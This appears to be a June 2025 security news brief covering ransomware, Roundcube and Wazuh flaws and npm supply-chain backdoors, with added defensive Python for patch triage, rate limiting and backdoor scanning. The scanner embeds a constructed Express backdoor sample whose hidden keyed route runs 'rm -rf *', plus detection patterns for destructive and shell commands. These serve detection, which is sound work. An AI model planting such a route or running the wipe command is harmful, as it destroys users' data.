Svoboda Cybersecurity Brief June 10, 2025


Ransomware Attack on AMI Group by APT73

AMI Group, a multinational conglomerate, confirmed a ransomware attack by APT73 that targeted the digital platforms it plans to launch in July 2025. The FBI alerted the company; no ransom was paid and production systems were not affected. Impact: Isolated to pre-launch systems, but it shows APT73's focus on high-value targets. Mitigation: FBI collaboration, internal IT audits, and enhanced cyber defenses.
Source: DataBreaches

Over 84,000 Roundcube Instances Vulnerable to RCE Flaw (CVE-2025-49113)

A critical post-authentication remote code execution (RCE) flaw in Roundcube (versions 1.1.0 through 1.6.10) is being actively exploited: the $_GET['_from'] parameter in the upload handler is not sanitized, which lets a logged-in user trigger PHP object deserialization and run code on the mail server. Exploits are being sold on underground forums, with shared-hosting providers and government webmail among the targets; note that the attacker needs valid webmail credentials (or a stolen session) first. Impact: Data theft, session hijacking, code execution on the mail server. Mitigation: Update to Roundcube 1.6.11 (1.6 branch) or 1.5.10 (1.5 branch); while patching is pending, disable file uploads and enforce CSRF protections.
Source: BleepingComputer

Sensata Technologies Confirms Data Breach After Ransomware Attack

Sensata Technologies disclosed that a March 2025 ransomware attack exfiltrated Social Security numbers, passport details, financial data, and medical records of current and former employees. The intruders had access for nine days before the breach was detected. Impact: High-risk data exposure for current and former staff. Mitigation: Credit monitoring offered, investigation ongoing.
Source: BleepingComputer

Chinese Hackers Target SentinelOne in Supply Chain Attack Attempt

Chinese-linked APT15/UNC5174 and APT41 targeted SentinelOne and 70+ organizations via ShadowPad malware and compromised IT logistics vendors. Attacks leveraged Ivanti/Check Point exploits. Impact: Reconnaissance for future attacks, supply chain risks. Mitigation: No compromise detected; enhanced monitoring.
Source: The Hacker News

Mirai Botnets Exploit Wazuh Server Vulnerability (CVE-2025-24016)

Two Mirai botnet variants (LZRD and Resbot) are exploiting CVE-2025-24016, a CVSS 9.9 unsafe-deserialization flaw in the Wazuh server API (versions 4.4.0 through 4.9.0): attacker-supplied JSON sent to the DistributedAPI is turned back into Python objects, giving remote code execution on the SIEM itself. The same campaigns also abuse other exploits against Hadoop YARN, TP-Link and ZTE devices. Impact: DDoS participation, device compromise, and a foothold on security infrastructure. Mitigation: Patch to Wazuh 4.9.1 or later and keep the server API (default TCP port 55000) off the internet.
Source: The Hacker News
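
The Roundcube and Wazuh items above both come down to "which of my installs sit inside the affected range and have not received the branch fix". The script below is an added example for this brief, not code from either project or their vendors; it encodes the thresholds the two items give (Roundcube 1.1.0 to 1.6.10 affected, fixed in 1.6.11 and 1.5.10, so 1.1 to 1.4 installs have no in-branch fix; Wazuh 4.4.0 to 4.9.0 affected, fixed in 4.9.1) and runs them over a constructed inventory. Host names and versions in INVENTORY are made up for illustration.

```python
"""Patch-status triage for Roundcube CVE-2025-49113 and Wazuh CVE-2025-24016.

Added example, not code from either project. Version thresholds are taken from
the two brief items; the inventory is constructed sample data.
"""
import re

# product -> affected range (inclusive) and first fixed release per branch
ADVISORIES = {
    "roundcube": {
        "cve": "CVE-2025-49113",
        "first_affected": (1, 1, 0),
        "last_affected": (1, 6, 10),
        "fixed": {(1, 5): (1, 5, 10), (1, 6): (1, 6, 11)},
    },
    "wazuh": {
        "cve": "CVE-2025-24016",
        "first_affected": (4, 4, 0),
        "last_affected": (4, 9, 0),
        "fixed": {(4,): (4, 9, 1)},   # any 4.x at or above 4.9.1 carries the fix
    },
}

# constructed sample data: host, product, version
INVENTORY = """\
# host                 product    version
mail1.example.com      roundcube  1.6.10
mail2.example.com      roundcube  1.5.10
legacy.example.com     roundcube  1.4.13
siem.example.com       wazuh      4.8.2
siem2.example.com      wazuh      4.9.1
"""


def parse_version(text):
    """'v1.6.10' / '4.9' -> (1, 6, 10) / (4, 9, 0); pre-release suffixes are ignored."""
    m = re.match(r"^v?(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(part or 0) for part in m.groups())


def fmt(version):
    return ".".join(str(p) for p in version)


def assess(product, version_text):
    """Return (status, detail): 'patched', 'vulnerable' or 'not affected'."""
    adv = ADVISORIES[product]
    v = parse_version(version_text)
    # A backported fix on the host's own branch wins even though the version
    # number sits inside the affected range (Roundcube 1.5.10 < 1.6.10).
    for prefix, fixed in adv["fixed"].items():
        if v[: len(prefix)] == prefix and v >= fixed:
            return "patched", f"{adv['cve']} fixed in {fmt(fixed)}"
    if adv["first_affected"] <= v <= adv["last_affected"]:
        # Prefer the fix on the host's branch; otherwise the newest fixed release.
        target = next(
            (f for p, f in adv["fixed"].items() if v[: len(p)] == p),
            max(adv["fixed"].values()),
        )
        return "vulnerable", f"{adv['cve']}: upgrade to {fmt(target)}"
    return "not affected", f"{adv['cve']} does not cover {fmt(v)}"


def triage(inventory_text):
    """Map host -> (status, detail) for every non-comment line of the inventory."""
    results = {}
    for line in inventory_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        host, product, version = line.split()[:3]
        results[host] = assess(product, version)
    return results


if __name__ == "__main__":
    for host, (status, detail) in sorted(triage(INVENTORY).items()):
        print(f"{status:<13} {host:<22} {detail}")
```

The branch-aware check matters because a plain "version < 1.6.11" test would flag the patched 1.5.10 as vulnerable, and a plain "version >= 1.6.11" test would pass a 1.7 build if one existed without knowing whether it is affected; feed the script the version strings your scanner or package manager reports rather than trusting the web UI banner.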

UNFI Wholesale Giant Hit by Cyberattack, Systems Taken Offline

United Natural Foods (UNFI) took systems offline after detecting unauthorized activity on June 5, disrupting its ability to fulfill customer orders. Impact: Operational delays, potential supply chain ripple effects for the grocers it supplies. Mitigation: Workarounds implemented, law enforcement notified.
Source: BleepingComputer

Google Fixes Bug Leaking Phone Numbers via Account Recovery

A legacy no-JavaScript username-recovery form let an attacker brute-force the phone number linked to any Google account: per-IP rate limits were defeated by rotating through addresses in a single IPv6 /64 range, and the CAPTCHA by reusing a BotGuard token obtained from the JavaScript version of the form. Researcher brutecat reported the bug and Google fixed it. Impact: Phishing and SIM-swapping risk for targeted accounts. Mitigation: Google deprecated the vulnerable endpoint.
Source: BleepingComputer
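
The two bypasses in the item above map to two server-side mistakes: counting attempts per address (one customer controls 2^64 IPv6 addresses, so a per-address limit is no limit at all) and accepting an anti-bot token from a different form than the one that issued it. The code below is an added example for this brief, not Google's code; the limit (10 attempts per 60 seconds), the /64 bucket, the form identifiers and the attacker addresses are constructed choices for illustration.

```python
"""Rate limiting keyed by network allocation, plus single-use anti-bot tokens
bound to the form that issued them.

Added example, not Google's code. Limits, prefix lengths, form ids and the
attacker's address range are constructed.
"""
import hashlib
import hmac
import ipaddress
import secrets
from collections import defaultdict, deque

IPV6_BUCKET_PREFIX = 64   # a single customer usually controls an entire /64
IPV4_BUCKET_PREFIX = 32   # for IPv4 keep per-address buckets


def client_bucket(ip_text):
    """Collapse an address to the allocation it most likely belongs to."""
    ip = ipaddress.ip_address(ip_text)
    plen = IPV6_BUCKET_PREFIX if ip.version == 6 else IPV4_BUCKET_PREFIX
    return str(ipaddress.ip_network(f"{ip}/{plen}", strict=False))


class SlidingWindowLimiter:
    """Allow at most `limit` hits per `window_s` seconds per key."""

    def __init__(self, limit, window_s, key_fn=client_bucket):
        self.limit, self.window, self.key_fn = limit, window_s, key_fn
        self.hits = defaultdict(deque)

    def allow(self, ip_text, now):
        q = self.hits[self.key_fn(ip_text)]
        while q and now - q[0] >= self.window:
            q.popleft()                     # drop hits that left the window
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def simulate_rotation(limiter, attempts=50, prefix="2001:db8:1:2::"):
    """An attacker sends `attempts` guesses, each from a different address in
    one /64, 10 ms apart. Returns how many the limiter let through."""
    allowed = 0
    for i in range(attempts):
        if limiter.allow(f"{prefix}{i + 1:x}", now=i * 0.01):
            allowed += 1
    return allowed


class FormTokens:
    """Anti-bot tokens: HMAC over (form id, nonce), valid for that form only
    and spent on first redemption, so a token minted for the JavaScript form
    cannot be replayed against a no-JavaScript fallback."""

    def __init__(self, secret):
        self.secret = secret
        self.spent = set()

    def _mac(self, form_id, nonce):
        return hmac.new(self.secret, f"{form_id}:{nonce}".encode(), hashlib.sha256).hexdigest()

    def issue(self, form_id):
        nonce = secrets.token_hex(8)
        return f"{form_id}:{nonce}:{self._mac(form_id, nonce)}"

    def redeem(self, token, form_id):
        try:
            tok_form, nonce, mac = token.split(":")
        except ValueError:
            return False
        if not hmac.compare_digest(mac, self._mac(tok_form, nonce)):
            return False                    # forged or tampered
        if tok_form != form_id or token in self.spent:
            return False                    # wrong form, or replayed
        self.spent.add(token)
        return True


if __name__ == "__main__":
    print("per-address limiter let through:", simulate_rotation(SlidingWindowLimiter(10, 60, key_fn=str)))
    print("per-/64 limiter let through:    ", simulate_rotation(SlidingWindowLimiter(10, 60)))
    tokens = FormTokens(b"server-side secret (constructed)")
    t = tokens.issue("recovery-js")
    print("replay on no-JS form accepted:", tokens.redeem(t, "recovery-nojs"))
```

In production the counters live in a shared store rather than a process-local dict, and a second, looser bucket at /48 catches attackers who hold a whole /48; the point here is that the key must be the allocation, not the address. Form ids must not contain ":" with this token layout.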

React Native Aria Packages Backdoored in Supply Chain Attack

17 packages from the React Native Aria project were republished with a remote access trojan appended to their build output. The payload uses a "Python3127" PATH hijack: it adds a fake Python3127 directory to the Windows PATH so that a trojanized python.exe there runs in place of the real interpreter. The attackers published the versions with compromised npm tokens. Impact: Low execution risk (frontend-only lib). Mitigation: Revoked tokens, enabled 2FA.
Source: SecurityWeek

Nigerian Cybercriminal Sentenced for Tax Prep Firm Hacks

Kingsley Utulu received 63 months for stealing data from US tax firms, filing fraudulent claims, and laundering $2.5M. Impact: Financial fraud, identity theft.
Source: SecurityWeek

Malicious NPM Packages Wipe Systems via Express Backdoors

The express-api-sync and system-health-sync-api packages posed as utilities but registered hidden HTTP endpoints in the host's Express app; a request carrying the attacker's key triggered a recursive delete of the application directory. Impact: Data destruction, server compromise. Mitigation: Audit dependencies, watch for routes your own code did not register.
Source: SecurityWeek
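
A dependency that registers its own route and runs a destructive command inside it leaves a recognisable footprint in source, and that footprint can be checked before the package ever handles a request. The scanner below is an added example for this brief, not Socket's or npm's tooling; the two JavaScript samples are constructed to show the pattern (the malicious one is modelled on the description above, not the real package source), and the route path and key in it are placeholders. scan_tree() applies the same rules to a real node_modules directory.

```python
"""Heuristic scan for Express-style backdoors: a module that registers an HTTP
route and, in the same file, executes shell or destructive filesystem commands.

Added example, not from Socket, npm or the packages named in the brief. The two
samples below are constructed; the malicious route path and key are placeholders.
"""
import os
import re

ROUTE_REG = re.compile(r"\b(?:app|router|server)\.(?:get|post|put|patch|delete|all|use)\s*\(\s*['\"`]/")
SHELL_EXEC = re.compile(r"require\(\s*['\"]child_process['\"]\s*\)|\bexec(?:Sync|File|FileSync)?\s*\(|\bspawn(?:Sync)?\s*\(")
DESTRUCTIVE = re.compile(r"rm\s+-rf|rmdir\s+/s|del\s+/[fq]|\.rm(?:Sync)?\s*\([^)]*recursive|\.rmdir(?:Sync)?\s*\(", re.I)
EXFIL = re.compile(r"nodemailer|sendMail\s*\(|process\.env\b")

# constructed sample modelled on the pattern in the brief, NOT the real package
MALICIOUS_SAMPLE = r"""
const { execSync } = require('child_process');
module.exports = function attach(app) {
  app.post('/api/_internal/sync', (req, res) => {        // placeholder path
    if (req.body.key !== 'PLACEHOLDER_KEY') return res.status(404).end();
    execSync('rm -rf *', { cwd: process.cwd() });
    res.json({ status: 'synced' });
  });
};
"""

# constructed benign sample: a normal health-check route
BENIGN_SAMPLE = r"""
const express = require('express');
const app = express();
app.get('/health', (req, res) => res.json({ status: 'ok' }));
module.exports = app;
"""


def scan_source(name, text):
    """Return a list of (severity, message) findings for one JavaScript file."""
    findings = []
    has_route = bool(ROUTE_REG.search(text))
    has_shell = bool(SHELL_EXEC.search(text))
    has_destr = bool(DESTRUCTIVE.search(text))
    has_exfil = bool(EXFIL.search(text))
    if has_route and has_destr:
        findings.append(("high", f"{name}: registers an HTTP route and contains a destructive command"))
    elif has_route and has_shell:
        findings.append(("medium", f"{name}: registers an HTTP route and executes shell commands"))
    elif has_destr:
        findings.append(("low", f"{name}: destructive command without a route (verify intent)"))
    if has_route and has_exfil:
        findings.append(("medium", f"{name}: HTTP route alongside environment/email access (possible exfiltration)"))
    return findings


def scan_tree(root):
    """Apply scan_source to every .js/.cjs/.mjs file under root (e.g. node_modules)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith((".js", ".cjs", ".mjs")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(os.path.relpath(path, root), fh.read()))
            except OSError:
                continue
    return findings


if __name__ == "__main__":
    for sample_name, text in (("malicious.js", MALICIOUS_SAMPLE), ("benign.js", BENIGN_SAMPLE)):
        print(sample_name, scan_source(sample_name, text) or "clean")
```

Expect noise from minified bundles and from legitimate dev tooling that shells out; treat a "high" hit as a reason to read the file, not as a verdict. The durable controls remain a lockfile with pinned versions, install scripts disabled in CI, and a review step for any dependency that wants to touch your HTTP router at all.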
